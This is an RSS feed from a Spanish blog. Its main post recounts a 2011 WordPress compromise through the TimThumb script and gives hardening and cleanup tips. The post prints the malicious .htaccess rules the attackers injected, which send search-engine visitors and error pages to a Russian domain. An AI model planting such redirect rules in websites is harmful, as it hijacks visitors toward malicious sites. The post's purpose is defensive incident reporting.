<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Análisis en Hackeame &#187; Actualizaciones</title>
	<atom:link href="http://www.hackeame.org/analisis/sobre-hackeame/actualizaciones/feed" rel="self" type="application/rss+xml" />
	<link>http://www.hackeame.org</link>
	<description>Análisis acerca de: Internet, Web 2.0, Servicios Web, Comparaciones, Tutoriales, y la Guerra de Navegadores</description>
	<lastBuildDate>Thu, 09 Feb 2012 20:19:44 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>&#191;Que hacer para evitar o solucionar un WordPress hackeado?</title>
		<link>http://www.hackeame.org/que-hacer-para-evitar-o-solucionar-un-wordpress-hackeado.analisis#utm_source=feed&#038;utm_medium=feed&#038;utm_campaign=feed</link>
		<comments>http://www.hackeame.org/que-hacer-para-evitar-o-solucionar-un-wordpress-hackeado.analisis#comments</comments>
		<pubDate>Wed, 14 Dec 2011 03:12:09 +0000</pubDate>
		<dc:creator>Isaac Zarzuri</dc:creator>
				<category><![CDATA[Actualidad Informática]]></category>
		<category><![CDATA[Actualizaciones]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[Sobre Hackeame]]></category>
		<category><![CDATA[TimThumb]]></category>
		<category><![CDATA[WordPress hackeado]]></category>

		<guid isPermaLink="false">http://www.hackeame.org/?p=1064</guid>
		<description><![CDATA[El pasado viernes 9 de diciembre parte de la seguridad del hosting fue vulnerable por varias horas, ya había pasado este tipo de intentos de ataque antes por supuesto, pero siempre sin éxito, me refiero a los intentos de hackear Hackeame, lamentablemente el viernes pasado, alguien usó un exploit en un theme perteneciente al theme [...]]]></description>
			<content:encoded><![CDATA[<!-- google_ad_section_start --><p align="justify"><a href="http://www.hackeame.org/wp-content/uploads/2011/12/wordpress-hacked.jpg#utm_source=feed&amp;utm_medium=feed&amp;utm_campaign=feed"><img style="background-image: none; padding-left: 0px; padding-right: 0px; display: block; float: none; margin-left: auto; margin-right: auto; padding-top: 0px; border: 0px;" title="wordpress-hacked" src="http://www.hackeame.org/wp-content/uploads/2011/12/wordpress-hacked_thumb.jpg" alt="wordpress-hacked" width="600" height="397" border="0" /></a></p>
<p align="justify">El pasado viernes 9 de diciembre parte de la seguridad del hosting fue vulnerable por varias horas, ya había pasado este tipo de intentos de ataque antes por supuesto, pero siempre sin éxito, me refiero a los intentos de hackear <a href="http://www.hackeame.org/informacion/hackeame" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con hackeame">Hackeame</a>, lamentablemente el viernes pasado, alguien usó un exploit en un theme perteneciente al theme <strong>HeadLines</strong> de la empresa <strong>WooThemes</strong>, el script en si que les dejo explotar el sitio fue el: <strong><a href="http://www.hackeame.org/informacion/timthumb" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con TimThumb">TimThumb</a></strong>.</p>
<p><span id="more-1064"></span></p>
<p align="justify">Lamentablemente tenía aquel theme, claro que sin uso ya que uso otro para este sitio, de igual forma se vio comprometido mi hosting entero, y por lo tanto todos mis otros sitios, como Hackeame.org, Hackeame.net, foro.hackeame.org así como otros.</p>
<p align="justify">Al parecer el exploit les permitía luego tener acceso total a hosting, por lo que si ellos hubieran querido hubieran <em><strong>defaced</strong></em> a todo el sitio y los subsitios que albergan en el. ¿Como se que tuvieron acceso a todo el hosting?, fue porque pudieron modificar varios archivos del sitio, ya que todos llevaban como detalle: modificación 5/12/2011 y 9/12/2011, y bueno la pagina principal: <strong><em>index.php</em></strong> también fue modificada y codificada, para que se re direccionara a un sitio ruso, mismo que no mencionare porque es peligroso en si.</p>
<p align="justify">Otra parte comprometida fue el archivo <strong><em>.htaccess</em></strong> que fue cambiado en cada dominio, el código que fue agregado fue:</p>
<div class="igBar"><span id="lphp-2"><a href="##utm_source=feed&amp;utm_medium=feed&amp;utm_campaign=feed" onclick="javascript:showCodeTxt('php-2'); return false;">Clic para ver Texto Plano</a></span></div>
<div class="syntax_hilite"><span class="langName">PHP:</span>
<div id="php-2">
<div class="php">
<ol>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#3A6A8B;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">RewriteEngine On</div>
</li>
<li style="font-weight: bold;color:#26536A;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">RewriteCond %<span style="color:#006600; font-weight:bold;">&#123;</span>HTTP_REFERER<span style="color:#006600; font-weight:bold;">&#125;</span> ^.*<span style="color:#006600; font-weight:bold;">&#40;</span>google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv|web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline<span style="color:#006600; font-weight:bold;">&#41;</span>\.<span style="color:#006600; font-weight:bold;">&#40;</span>.*<span style="color:#006600; font-weight:bold;">&#41;</span></div>
</li>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#3A6A8B;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">RewriteRule ^<span style="color:#006600; font-weight:bold;">&#40;</span>.*<span style="color:#006600; font-weight:bold;">&#41;</span>$ http:<span style="color:#FF9933; font-style:italic;">//connection-masters.ru/right/index.php</span></div>
</li>
<li style="font-weight: bold;color:#26536A;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"><span style="color:#006600; font-weight:bold;">&#91;</span>R=<span style="color:#CC66CC;color:#800000;">301</span>,L<span style="color:#006600; font-weight:bold;">&#93;</span></div>
</li>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#3A6A8B;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">ErrorDocument <span style="color:#CC66CC;color:#800000;">400</span> http:<span style="color:#FF9933; font-style:italic;">//connection-masters.ru/right/index.php</span></div>
</li>
<li style="font-weight: bold;color:#26536A;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">ErrorDocument <span style="color:#CC66CC;color:#800000;">401</span> http:<span style="color:#FF9933; font-style:italic;">//connection-masters.ru/right/index.php</span></div>
</li>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#3A6A8B;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">ErrorDocument <span style="color:#CC66CC;color:#800000;">403</span> http:<span style="color:#FF9933; font-style:italic;">//connection-masters.ru/right/index.php</span></div>
</li>
<li style="font-weight: bold;color:#26536A;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">ErrorDocument <span style="color:#CC66CC;color:#800000;">404</span> http:<span style="color:#FF9933; font-style:italic;">//connection-masters.ru/right/index.php</span></div>
</li>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#3A6A8B;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">ErrorDocument <span style="color:#CC66CC;color:#800000;">500</span> http:<span style="color:#FF9933; font-style:italic;">//connection-masters.ru/right/index.php </span></div>
</li>
</ol>
</div>
</div>
</div>
<p></p>
<p align="justify">El resultado de lo que agregaron en el archivo<strong><em> .htaccess</em></strong> fue que todas los visitantes que provenían de los buscadores, ejemplo Google, Yahoo, Bing, etc. todos automáticamente eran re direccionados al sitio ruso.</p>
<p align="justify">El día 5 de diciembre también hubo incidentes de este caso, pero basto con borrar el archivo y automáticamente WP recreaba uno nuevo, pero lo que paso el 9 de diciembre fue que cada vez que borrábamos el archivo el mismo archivo con el código malicioso volvía a crearse, y claro esto sucedió porque se modificaron archivos del <em>core</em> de WP.</p>
<p align="justify"><strong><a href="http://www.hackeame.org/wp-content/uploads/2011/12/Script-kiddie.jpg#utm_source=feed&amp;utm_medium=feed&amp;utm_campaign=feed"><img style="background-image: none; margin: 5px; padding-left: 0px; padding-right: 0px; display: inline; float: left; padding-top: 0px; border: 0px;" title="Script kiddie" src="http://www.hackeame.org/wp-content/uploads/2011/12/Script-kiddie_thumb.jpg" alt="Script kiddie" width="240" height="237" align="left" border="0" /></a>¿WordPress es seguro?</strong> esto me dice que no, no lo es en lo absoluto, bien podemos culpar al theme, o incluso al archivo <strong><em>thumb.php</em></strong>, pero acaso no es más culpable aquel que le dio permiso a un theme que ni siquiera esta en uso, hablo de WP, permisos que bien explotados pueden dar acceso total a cualquier <em><strong>Script kiddie </strong></em>sobre un hosting entero. Por supuesto que este archivo ahora puede estar corregido para evitar estos problemas, pero en lo personal WP no menciono que hubiera actualizaciones para este theme, ¿como habría de saberlo?.</p>
<p align="justify"><strong>Conclusiones</strong>: WordPress no es seguro, me dirán que ningún CMS lo es, y estoy de acuerdo, pero les dejo unos consejos de seguridad que debieron haber evitado este catástrofe si yo los hubiera hecho:</p>
<ul>
<li>
<div align="justify">Si tus visitas bajan hay un buen porcentaje que se deba a que has sido hackeado y tus visitas se re direccionan a otro sitio. Por lo que revisa que tu archivo .htaccess este siempre limpio.</div>
</li>
<li>
<div align="justify">Siempre haz una copia de tu base de datos al menos cada semana, si tienes flojera de hacerlo manualmente hay una gran cantidad de <a title="plugins para wordpress para base de datos" href="http://wordpress.org/extend/plugins/search.php?q=database+backup" target="_blank">plugins que crearan una copia de tu base de datos automáticamente</a> cada determinado tiempo.</div>
</li>
<li>
<div align="justify">Siempre hacer una copia de tus archivos ftp de tu hosting, esto es opcional, ya que si estas en un hosting mínimamente decente ellos lo hacen por ti.</div>
</li>
<li>
<div align="justify">Eliminar cualquier plugin o theme que no estés usando, ya que pueden ser una puerta abierta a los <em><strong>Script kiddie.</strong></em></div>
</li>
<li>
<div align="justify">Obviamente tener siempre actualizado tus plugin y tu WordPress, es tedioso muchas veces pero esencial hacerlo.</div>
</li>
<li>
<div align="justify">Échale un vistazo siempre a tus archivos y a su fechas de modificación, puede que estés bajo ataque desde hace mucho solo que aún no se han apoderado de todo, y estás aún a tiempo para parar los ataques, así que también mira los archivos <strong>error_log</strong> de tus sitios para ver que errores de permiso o similares tienes.</div>
</li>
<li>
<div align="justify">Fíjate si tienes un plugin o theme que use el archivo <em><strong>thumb.php </strong></em>o<em><strong> TimThumb.php </strong></em>en caso de ser tu respuesta positiva actualízalo ya mismo, bajándote la <a href="http://timthumb.googlecode.com/svn/trunk/timthumb.php" target="_blank">ultima versión de TimThumb</a><strong> </strong>y reemplazándola.</div>
</li>
</ul>
<p align="justify"><strong><span style="text-decoration: underline;">Si estás leyendo esto porque tu sitio fue hackeado</span></strong>, la solución es sencilla, borra todos tus archivos excepto la carpeta donde están tus archivos subidos como imágenes, etc. Luego proseguir a re subir una instalación limpia de wordpress, y claro luego cambias tu contraseña.</p>
<p align="justify">Otra forma es llamar al soporte de tu hosting y ellos harán todo esto por ti, sin que tengas que mover un dedo.</p>
<!-- google_ad_section_end -->]]></content:encoded>
			<wfw:commentRss>http://www.hackeame.org/que-hacer-para-evitar-o-solucionar-un-wordpress-hackeado.analisis/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Feliz Navidad! Desde Hackeame</title>
		<link>http://www.hackeame.org/feliz-navidad-desde-hackeame.analisis#utm_source=feed&#038;utm_medium=feed&#038;utm_campaign=feed</link>
		<comments>http://www.hackeame.org/feliz-navidad-desde-hackeame.analisis#comments</comments>
		<pubDate>Thu, 24 Dec 2009 23:36:10 +0000</pubDate>
		<dc:creator>Isaac Zarzuri</dc:creator>
				<category><![CDATA[Actualizaciones]]></category>
		<category><![CDATA[Sobre Hackeame]]></category>
		<category><![CDATA[feliz navida]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[hackeame]]></category>
		<category><![CDATA[navidad]]></category>
		<category><![CDATA[noche buena]]></category>

		<guid isPermaLink="false">http://www.hackeame.org/feliz-navidad-desde-hackeame.analisis</guid>
		<description><![CDATA[Hoy es una fecha muy especial, sin importar la excusa, la religión y/o el credo religioso, estamos contentos de pasar nuestra primera navidad junto con ustedes. Agradecemos sus visitas, comentarios, sin ustedes el sitio no tendría sentido. Deseamos que en estas fechas, puedan pasarla lo mejor posible, en compañía de quienes sean importantes para ustedes. [...]]]></description>
			<content:encoded><![CDATA[<!-- google_ad_section_start --><p><a href="http://www.hackeame.org/wp-content/uploads/2009/12/feliznavidad.jpg#utm_source=feed&amp;utm_medium=feed&amp;utm_campaign=feed"><img class="alignleft" style="display: block; margin: 5px; border: 0pt none;" title="feliz-navidad" src="http://www.hackeame.org/wp-content/uploads/2009/12/feliznavidad_thumb.jpg" border="0" alt="feliz-navidad" width="250" height="188" /></a>Hoy es una fecha muy especial, sin importar la excusa, la religión y/o el credo religioso, estamos contentos de pasar nuestra primera <a href="http://www.hackeame.org/informacion/navidad" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con navidad">navidad</a> junto con ustedes.</p>
<p>Agradecemos sus visitas, comentarios, sin ustedes el sitio no tendría sentido.</p>
<p><span id="more-631"></span>Deseamos que en estas fechas, puedan pasarla lo mejor posible, en compañía de quienes sean importantes para ustedes.</p>
<p>Aquí en Bolivia de donde soy, aún falta bastante, son las 19:24 PM, faltan 4 horas y 36 minutos.  Para dar comienzo a la “<a href="http://www.hackeame.org/informacion/noche-buena" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con noche buena">Noche Buena</a>”, desde aquí no dejan de sonar petardos, cohetes, y todo tipo de festejos. Por mi parte es una fecha más dentro del calendario, motivo de regalos, marketing, y comercio.</p>
<p>Sin más me despido, y les deseo lo mejor en estas fechas, y nos vemos pronto, ya volví de mis vacaciones ^^.</p>
<p>Deja tus deseos en los comentarios...</p>
<p><em><strong>Isaac Zarzuri</strong></em></p>
<!-- google_ad_section_end -->]]></content:encoded>
			<wfw:commentRss>http://www.hackeame.org/feliz-navidad-desde-hackeame.analisis/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Próximos temas en Hackeame</title>
		<link>http://www.hackeame.org/proximos-temas-en-hackeame.analisis#utm_source=feed&#038;utm_medium=feed&#038;utm_campaign=feed</link>
		<comments>http://www.hackeame.org/proximos-temas-en-hackeame.analisis#comments</comments>
		<pubDate>Mon, 02 Nov 2009 14:52:55 +0000</pubDate>
		<dc:creator>Isaac Zarzuri</dc:creator>
				<category><![CDATA[Actualizaciones]]></category>
		<category><![CDATA[Sobre Hackeame]]></category>
		<category><![CDATA[Guerra de Navegadores]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[hackeame]]></category>
		<category><![CDATA[navegador]]></category>
		<category><![CDATA[Navegadores]]></category>
		<category><![CDATA[pr]]></category>

		<guid isPermaLink="false">http://www.hackeame.org/?p=452</guid>
		<description><![CDATA[Hola a todos, antes que nada disculparme por no publicar en estos 4 días. Ayer estaba empezando a escribir un artículo sobre: Guerra de Navegadores, ya iba mas de 10.000 palabras, pero sucede que luego se me fue la luz, no pude salvar nada. Hoy volvere a hacer el tema, este mensaje es para decirles [...]]]></description>
			<content:encoded><![CDATA[<!-- google_ad_section_start --><p>Hola a todos, antes que nada disculparme por no publicar en estos 4 días.</p>
<p>Ayer estaba empezando a escribir un artículo sobre:</p>
<p>Guerra de <a href="http://www.hackeame.org/informacion/navegadores" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Navegadores">Navegadores</a>, ya iba mas de 10.000 palabras, pero sucede que luego se me fue la luz, no pude salvar nada. Hoy volvere a hacer el tema, este mensaje es para decirles que estoy trabajando en ello.</p>
<p>Sera un artículo super interesante, esperenlo.</p>
<p>Disculpas por la demora.</p>
<!-- google_ad_section_end -->]]></content:encoded>
			<wfw:commentRss>http://www.hackeame.org/proximos-temas-en-hackeame.analisis/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

